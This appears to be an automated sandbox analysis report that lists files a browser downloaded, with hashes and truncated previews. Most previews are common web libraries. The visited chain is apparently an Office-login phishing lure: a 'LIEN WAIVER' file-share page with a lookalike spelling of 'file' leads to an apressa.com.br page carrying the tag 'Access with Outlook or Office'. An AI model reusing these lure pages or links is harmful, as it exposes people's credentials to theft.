                                                                                                                    Preview:wOF2......E...........EA.........................(.....R.`..~..*..b.....,..y..T..6.$..$. .. ..+..1...%..l...s>..@..:.......v.B.y)......XI..n..../R@.,|.('E:.r..u..n.:..Oj..`4[....kG.K.w.q...l.....#}...J."....CT.j.....&..lO..B...w.._.=...DC.7^.6.c$+'/....o....c.C... k.V..d^....N..?.Y.ORp.YP....=..... ..p....6X......j.Fo..(.....#..'w=L<,<.(...^.^...N..{.+..i6........".q.R......}3.f[Q.~<].....Q.!..l..6%Vn...z3.. .....3"...j..ugE{M.]u.....nB.[.sH...7d..[./....6)~.H...u.....)A.$.......Jsssq..P.I........?.YQ.inx.. .2X.....oEMQ..N..YN|B%.cM.....Ul....o.g.K..R.d.y.e.v...<..rf~....[....>.e.K.......[7A.w1A.o.5.p.E{h........s.....oR...J .(g.....0g..,ys.....~m...QG...r..OnN.../U...u...J.\....b....f..J.s).2....R....5l.1.i.. ..7..+.....=.S......h..X.mHM.{..x. ... ..........{.b.."..R...1..........}..........z......./O...h........YK\BB.F..J......k.R.AS.MT9...&g..u.'.:.$.k..s.%....B...O,.l[..i.......{g.R[.wbM.."...."..=.....F$.#R_...o.H.<....A...JQ.p.u.|..s...^BL..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65485)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):193114
                                                                                                                    Entropy (8bit):5.243230227857346
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:8AB16BA592DAE3D93E02223F00774234
                                                                                                                    SHA1:090805E809B215CDD380B89ECDD81EA9EB722F4D
                                                                                                                    SHA-256:4C08FBC8139CF550A626A2259E9E8FCBA42A08C55F95946A1FBBC87167C7345A
                                                                                                                    SHA-512:089F2EF3C8966F1FA0980BD5B7111C226F31300A56BE2A07B825282A80AEB91DD6AC2EC7F68232E8F48E0DCCCF0DA3FB2E9A8AB790A2A59404DE5890FDCE04F1
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/7db29c7d4236cabf432a.js
                                                                                                                    Preview:/*! For license information please see LICENSES */.(window.webpackJsonp=window.webpackJsonp||[]).push([[5],[,,function(t,e,n){"use strict";(function(t,n){var r=Object.freeze({});function o(t){return null==t}function c(t){return null!=t}function f(t){return!0===t}function l(t){return"string"==typeof t||"number"==typeof t||"symbol"==typeof t||"boolean"==typeof t}function d(t){return null!==t&&"object"==typeof t}var h=Object.prototype.toString;function v(t){return"[object Object]"===h.call(t)}function y(t){return"[object RegExp]"===h.call(t)}function m(t){var e=parseFloat(String(t));return e>=0&&Math.floor(e)===e&&isFinite(t)}function _(t){return c(t)&&"function"==typeof t.then&&"function"==typeof t.catch}function w(t){return null==t?"":Array.isArray(t)||v(t)&&t.toString===h?JSON.stringify(t,null,2):String(t)}function x(t){var e=parseFloat(t);return isNaN(e)?t:e}function O(t,e){for(var map=Object.create(null),n=t.split(","),i=0;i<n.length;i++)map[n[i]]=!0;return e?function(t){return map[t
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (930), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):930
                                                                                                                    Entropy (8bit):5.118473677411452
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:F5EADDB4DFC7E121ABA2112E1CA3EF2D
                                                                                                                    SHA1:4C8617E748F288236BA239FE3EB2EE39DA929AA1
                                                                                                                    SHA-256:34A85E78B5402C253C2BC4CF64426C2B6B18601602E8A9A71568139FB3EE6599
                                                                                                                    SHA-512:A05791E2B1CEE4945B41F4504EC83DD846995AE70EC9A1882D650A745B13AE8389A8A423ECA56372C216D20029CED76FC76E841CEAE0E1A0B8BB9FD8F364769A
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://m.stripe.network/inner.html
                                                                                                                    Preview:<!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.44.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=false/.test(e)||(e=(e=e.match(/version=(4|6)/))?e[1]:"4",window.StripeM.p({t:!0,v:e})),e=function(e){if(window.opener||window.parent||window)try{var i=((t=JSON.parse(e.data)).message||t).action,t=t.message?t.message.payload:t;switch(i){case"ping":window.StripeM.p({t:!0,o:{muid:t.muid,sid:t.sid,referrer:t.referrer,url:t.url,title:t.title,v2:t.v2},v:t.version||"4"});break;case"track":if(!t.source||!t.data)return;window.StripeM.b({muid:t.muid,sid:t.sid,url:t.url,source:t.source,data:t.data},t.version||"4")}}catch(e){}},window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onMessage",e))},document.body.appendChild(e)}()</script></body></html>
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (4806)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4808
                                                                                                                    Entropy (8bit):4.9310928080026395
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B2B13A0D1DD80E381A7F1C749CDD0E07
                                                                                                                    SHA1:0814D24DF44D23D066356DE1830446B0E5D5E3E0
                                                                                                                    SHA-256:EA129A65B3BECB6B6F1E6991271E44317AA5018D3FCBF26C73A3442B18E3BBE5
                                                                                                                    SHA-512:AEC068F28F9DFE9B23B5C81840167746B7E0F534BDB90357D8444F2FFB2F452F7615E1A042B490DB3AC4D0FE4872FCF17E7483190888CEA3191E84204A876856
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-strategies.prod.js
                                                                                                                    Preview:this.workbox=this.workbox||{},this.workbox.strategies=function(e,t,s,n,r){"use strict";try{self["workbox:strategies:4.3.1"]&&_()}catch(e){}class i{constructor(e={}){this.t=t.cacheNames.getRuntimeName(e.cacheName),this.s=e.plugins||[],this.i=e.fetchOptions||null,this.h=e.matchOptions||null}async handle({event:e,request:t}){return this.makeRequest({event:e,request:t||e.request})}async makeRequest({event:e,request:t}){"string"==typeof t&&(t=new Request(t));let n,i=await s.cacheWrapper.match({cacheName:this.t,request:t,event:e,matchOptions:this.h,plugins:this.s});if(!i)try{i=await this.u(t,e)}catch(e){n=e}if(!i)throw new r.WorkboxError("no-response",{url:t.url,error:n});return i}async u(e,t){const r=await n.fetchWrapper.fetch({request:e,event:t,fetchOptions:this.i,plugins:this.s}),i=r.clone(),h=s.cacheWrapper.put({cacheName:this.t,request:e,response:i,event:t,plugins:this.s});if(t)try{t.waitUntil(h)}catch(e){}return r}}class h{constructor(e={}){this.t=t.cacheNames.getRuntimeName(e.cacheNam
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 100x100, components 3
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):2028
                                                                                                                    Entropy (8bit):7.558591904591356
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:184CFD8BA8A7F68DDDAF18B5262DE568
                                                                                                                    SHA1:3B03C99F70B5EF969217DD88615AA5E2792CB575
                                                                                                                    SHA-256:C05084417F95BD226ED43612270FE429FE8D353974895E07339121D47DF57743
                                                                                                                    SHA-512:699FF14E8C535322F9705A9C0746C698FC1355DE1EC653AD1B87D23BC7387F51CBC238860CA764006D651926502288720529799923698F9E63E2264AC52BCAD0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://apressa.com.br/wp-content/uploads/2022/03/favicon-100x100.jpg
                                                                                                                    Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R.(....~.x.O...X.=R.....Op....<..q.;WA......_.......@.UEz..G....|s...0.........e......4..TW...d|......?..........._.......@.UEz..G....|s...0..r.:............g.....H.}.6.......(...(...(...._..Jz...2...D5yUz.....%=...}........(...(...(...(...(...(..=W.h............^U^..4..O_.._..*.........'....C.Gu07./...~i..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65485)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):810930
                                                                                                                    Entropy (8bit):5.367058602251701
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:1188A79EA0C3AA72C25C90226559F121
                                                                                                                    SHA1:3DB160514C491B0AA2F957D610D7C079DE6923ED
                                                                                                                    SHA-256:882E5D213C2F6A716A4D4848F5E3CC1BBA2B133B37A19B6B6BAE41F143904BD2
                                                                                                                    SHA-512:8108DD528C67088197C0BA842E5F5A2058CFB5153B4409F64D5C57BC917AE12039D49A5F8615BCA43E796581D616C7F3768E594CB9D45AED4205C08157A7A1EE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/fc61e2c5da5fa4b1ee14.js
                                                                                                                    Preview:/*! For license information please see LICENSES */.(window.webpackJsonp=window.webpackJsonp||[]).push([[39],[function(t,n,e){"use strict";e.d(n,"b",(function(){return o})),e.d(n,"a",(function(){return l})),e.d(n,"e",(function(){return c})),e.d(n,"c",(function(){return m})),e.d(n,"d",(function(){return d}));var r=function(t,b){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,b){t.__proto__=b}||function(t,b){for(var p in b)b.hasOwnProperty(p)&&(t[p]=b[p])})(t,b)};function o(t,b){function n(){this.constructor=t}r(t,b),t.prototype=null===b?Object.create(b):(n.prototype=b.prototype,new n)}var l=function(){return(l=Object.assign||function(t){for(var s,i=1,n=arguments.length;i<n;i++)for(var p in s=arguments[i])Object.prototype.hasOwnProperty.call(s,p)&&(t[p]=s[p]);return t}).apply(this,arguments)};function c(t){var s="function"==typeof Symbol&&Symbol.iterator,n=s&&t[s],i=0;if(n)return n.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.len
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):212425
                                                                                                                    Entropy (8bit):5.314099997174475
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:EE46C2E8246168E74B0651180912456F
                                                                                                                    SHA1:0E81051BA8B8CA6D21B9567997BB781D6DCCC5F9
                                                                                                                    SHA-256:0D595E67B0660316B0E22BA431031B9AAC21A12DC43C727CA7B210D09E612791
                                                                                                                    SHA-512:0F61B3838DB9D80AD6AB0BAEB2D521CA6E7F2A0D0B7A699E70E1552F1A699A260EE6D4A6887C6AFD154DE3DC90481245E23730398F5921FD90BBC591FE0DF1F3
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/b6ccb04ec77bec22f317.js
                                                                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[4],{113:function(t,e,n){"use strict";e.a={methods:{trackUserActivity:function(){if(!document.getElementById("hotjar-script")){var script=document.createElement("script");script.id="hotjar-script",script.type="text/javascript",script.innerHTML="\n (function(h,o,t,j,a,r){\n h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};\n h._hjSettings={hjid:1998412,hjsv:6};\n a=o.getElementsByTagName('head')[0];\n r=o.createElement('script');r.async=1;\n r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;\n a.appendChild(r);\n })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');\n ",document.getElementsByTagName("head")[0].appendChild(script)}}}}},134:function(t,e,n){"use strict";var o={};o["campaign-tracker"]=n(338),o["campaign-tracker"]=o["campaign-tracker"].default||o["campaign-tracker"],o.subdomain=n(339),o.subdomain=o.subdomain.default||o.subdomain,e.a=o},145:functio
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (39354), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):39354
                                                                                                                    Entropy (8bit):5.221841456977438
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:5D61EEDC6D9847C0682107FAAFE24770
                                                                                                                    SHA1:460B20C80F0AD1407CA1B3B8E2A22DF5C4EC1D56
                                                                                                                    SHA-256:5A6DCB12E2B461998DEB31368B78D5E99A1503F50707BBA556C03A5FA991B6A3
                                                                                                                    SHA-512:1933E1F972F25D12FB55CA9DC55745CAAD70AF9AFCCDF17027B5CF219FBAEFADCF26067466D99DACEE97FCCF2F9B028A01B40862C9E1B41D268FD2D100283117
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/85ae7cee2ddbc92082ce.js
                                                                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[2],{501:function(t,e,n){var content=n(535);"string"==typeof content&&(content=[[t.i,content,""]]),content.locals&&(t.exports=content.locals);(0,n(14).default)("52c399da",content,!0,{sourceMap:!1})},502:function(t,e,n){var content=n(539);"string"==typeof content&&(content=[[t.i,content,""]]),content.locals&&(t.exports=content.locals);(0,n(14).default)("11842b62",content,!0,{sourceMap:!1})},503:function(t,e,n){var content=n(543);"string"==typeof content&&(content=[[t.i,content,""]]),content.locals&&(t.exports=content.locals);(0,n(14).default)("74103700",content,!0,{sourceMap:!1})},504:function(t,e,n){"use strict";n(19);var o={props:{time:{type:Object,required:!0}}},r=n(20),c={components:{SegmentedTimeBlocks:Object(r.a)(o,(function(){var t=this,e=t.$createElement,n=t._self._c||e;return n("div",{staticClass:"countdown-timer-container d-flex justify-center"},[n("div",{staticClass:"countdown-timer-block"},[n("div",{staticClass:"countdown-t
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):26186
                                                                                                                    Entropy (8bit):5.305914442487392
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:C6DF48ABDE1EF4746872B98529EDC294
                                                                                                                    SHA1:11B2F5417A7D6AF49846C5792039538724E4C261
                                                                                                                    SHA-256:9887E967F5433B1A1023DCB383CC271A2F3D4FF1CE8ED9AEE182B25BD534E35E
                                                                                                                    SHA-512:C77E61ED7CD5DBD8C39F0A5C3074F8ADC040A808D8F039E1A7E24FC62FCBBA5C771D4D2DB0F507B30F5A3C764DB4DB11237F41E2BE7030C2E9A5C221CE3ADB77
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/signals/config/370162274269334?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (18726)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):447750
                                                                                                                    Entropy (8bit):5.02674789550692
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:86A245BD7BC44B4514E60D92B5F078E2
                                                                                                                    SHA1:3184975BDA121F84EC4A56FFD3ACA5707A45685A
                                                                                                                    SHA-256:EEDB834DDE50CE30DEC323115C496DEB0668C2A2648F8980E6FFDB1AA168208A
                                                                                                                    SHA-512:34E4F0CF7B0732E385580910039EE36CAFE479FA9540D9A1DB3E328BC5DDC6BB14201840C514CA80EBD4A5A0127607424FA5A7F9B30444D0DA35C01D02C49B63
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/ssfuels
                                                                                                                    Preview:<!doctype html>.<html data-n-head-ssr lang="en" data-n-head="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D">. <head >. <title>LIEN WAIVER</title><meta data-n-head="ssr" charset="utf-8"><meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1"><meta data-n-head="ssr" data-hid="mobile-web-app-capable" name="mobile-web-app-capable" content="yes"><meta data-n-head="ssr" data-hid="apple-mobile-web-app-title" name="apple-mobile-web-app-title" content="linktube"><meta data-n-head="ssr" data-hid="og:type" name="og:type" property="og:type" content="website"><meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" property="og:site_name" content="linktube"><meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content=""><meta data-n-head="ssr" data-hid="description" name="description" content="Proceed to review fiIe shared with you."><meta data-n-head="ssr" data-hid="og:title" name="og:title" content="LIEN WAIVER"><meta data-n-head="ssr" data-hi
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (8178)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2066242
                                                                                                                    Entropy (8bit):5.180667725499849
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2DF40D9CDD6788F80F8B0144FD0BACA1
                                                                                                                    SHA1:24C8518A28F5B2BC91C0CF894402BB166E254E7F
                                                                                                                    SHA-256:1AED5702579E7187EF342C99EE662E280D902CB079B1034B48B56BAB3C71EF26
                                                                                                                    SHA-512:2658C6EB750B51B474E4687F0676A0B29BA8D46EFE2EEF251C3EA31EB5AD6BA332B315F85C6A9079D42E65C0569E41309FD685EBCBF39D80EE952E14C3AF4B5F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<!DOCTYPE html>.<html. class="MktRoot". lang="en-US". data-js-controller="Page". data-page-id="Home". data-page-title="Stripe | Financial Infrastructure to Grow Your Revenue". data-loading.>. <head>. <script>window.__capturedErrors = [];.window.onerror = function (message, url, line, column, error) { __capturedErrors.push(error); };.window.onunhandledrejection = function(evt) { __capturedErrors.push(evt.reason); }.</script>.<meta. name="sentry-config". data-js-dsn="https://7cd38b0eb2b348b39a6002cc768f91c7@errors.stripe.com/376". data-js-release="281e9546eeb6d4e0f66314299168eef1ab30dcb8". data-js-environment="production". data-js-project="mkt".>.. <meta name="edge-experiment-treatments" content="">.<meta name="experiment-treatments" content="wpp_homepage_title_copy.control.ursula.77725911-7e09-4632-9936-8c97fa61c58a.a,acquisition_chat_on_dot_com.control.ursula.5a276c23-3728-47cd-9f4b-40f95e62d7ae.m,acquisition_jp_homepage_holdback.control.ursula.d69c08b2-081d-4435-9181
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (3346)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):3348
                                                                                                                    Entropy (8bit):5.0450645425796585
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:6742DAD9EA373DFB2E736567B4DC5DDB
                                                                                                                    SHA1:9D2ADD5E2138069F3252393D912F03FE4A2AD291
                                                                                                                    SHA-256:6064D9B33ECAC3B1A18108F84A5DCF689B2155E8A37A4908013B2B9B6D0E3612
                                                                                                                    SHA-512:406F30B9B327E5084A1E4AC09A631082A4AAC50A5123F2575413AB34DC1EDFF98892BC07D4860855FC2B72ADC8C8F5B0B70098C61AE84CE74A21D0ECC55F060D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-routing.prod.js
                                                                                                                    Preview:this.workbox=this.workbox||{},this.workbox.routing=function(t,e,r){"use strict";try{self["workbox:routing:4.3.1"]&&_()}catch(t){}const s="GET",n=t=>t&&"object"==typeof t?t:{handle:t};class o{constructor(t,e,r){this.handler=n(e),this.match=t,this.method=r||s}}class i extends o{constructor(t,{whitelist:e=[/./],blacklist:r=[]}={}){super(t=>this.t(t),t),this.s=e,this.o=r}t({url:t,request:e}){if("navigate"!==e.mode)return!1;const r=t.pathname+t.search;for(const t of this.o)if(t.test(r))return!1;return!!this.s.some(t=>t.test(r))}}class u extends o{constructor(t,e,r){super(({url:e})=>{const r=t.exec(e.href);return r?e.origin!==location.origin&&0!==r.index?null:r.slice(1):null},e,r)}}class c{constructor(){this.i=new Map}get routes(){return this.i}addFetchListener(){self.addEventListener("fetch",t=>{const{request:e}=t,r=this.handleRequest({request:e,event:t});r&&t.respondWith(r)})}addCacheListener(){self.addEventListener("message",async t=>{if(t.data&&"CACHE_URLS"===t.data.type){const{payload:e
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (48664)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):48944
                                                                                                                    Entropy (8bit):5.272507874206726
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2003)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):7616
                                                                                                                    Entropy (8bit):5.7411878499748
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:F8EC33B1752C2BD9F125586F95EAC2AD
                                                                                                                    SHA1:F3A829560388BD3812CF2C8FF348E5EFCB05E7EC
                                                                                                                    SHA-256:4D393F6502F4E4560E7F8389EBDF9FB206488855124B054371CF8A2A58E228FB
                                                                                                                    SHA-512:01B76B2FA2C7F963F35B56703297EEAC549459941EFD89AB7F5A0A9A339767EC5ED0D4C7668FBF34E3D67FD62AB8C87F18B81FDD836590973D2E28D2E9FDCE83
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+Office
                                                                                                                    Preview:<html>..<head>.. <meta ..name="viewport" .content="width=device-width, . initial-scale=1.0">... ..<a>Eu rump chicken, fugiat beef ribs meatball reprehenderit voluptate turkey qui cillum shankle ham.</a>.. -->.. <script.src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>.<style>... .body..,.html.{ height: 100%;margin:..0;display:.flex;align-items:. center;justify-content: center }..@keyframes .bounce { ..0%...,.. 100%..,. 12.5% ,...32.5% .,. 76.1%.{. .transform:.translateY(0) } 22.5%. , ..86% { transform: translateY(7px) . } . }.. #nonfluidic { .height: .179px;width:.130px;overflow:.. hidden;margin-top:.-59px;margin-left:..25px..}.@keyframes. .shadow-fade..{ 0%. .,..100% , 21.2%.,. 80% ..{ . opacity: . 0 .}. .47% ,. 70%. .{ opacity:. 1 .}...}... .#overbrowse ..{.width:.130px;margin-top: .179px }.#squabasher.{ width:..130px;height: 71px;border-radius: . 0 0. 7px.. 7px;overflow:.. hidden;margin-top: -41px.}.. #squabasher >
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 17640, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):17640
                                                                                                                    Entropy (8bit):7.990751496382757
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:450EFA33FD7D38461701D7F0A37FBE2F
                                                                                                                    SHA1:AAE243F636749420FD77C0CF3AA9B683B47ED3E2
                                                                                                                    SHA-256:B7BE1A25FCDA009175B0F140BBD7ED9AFDB5798D0C93717B44C62DDC19AEF582
                                                                                                                    SHA-512:85E9359B9102F7453985EEAFDA50D8B2A7D19E1FD80C3CC5A88B07062BEEECC8988EA158E26671BDE97529AFACCA96F2CD551A57CECC305665FE773506B724CA
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB2KYNod.woff2
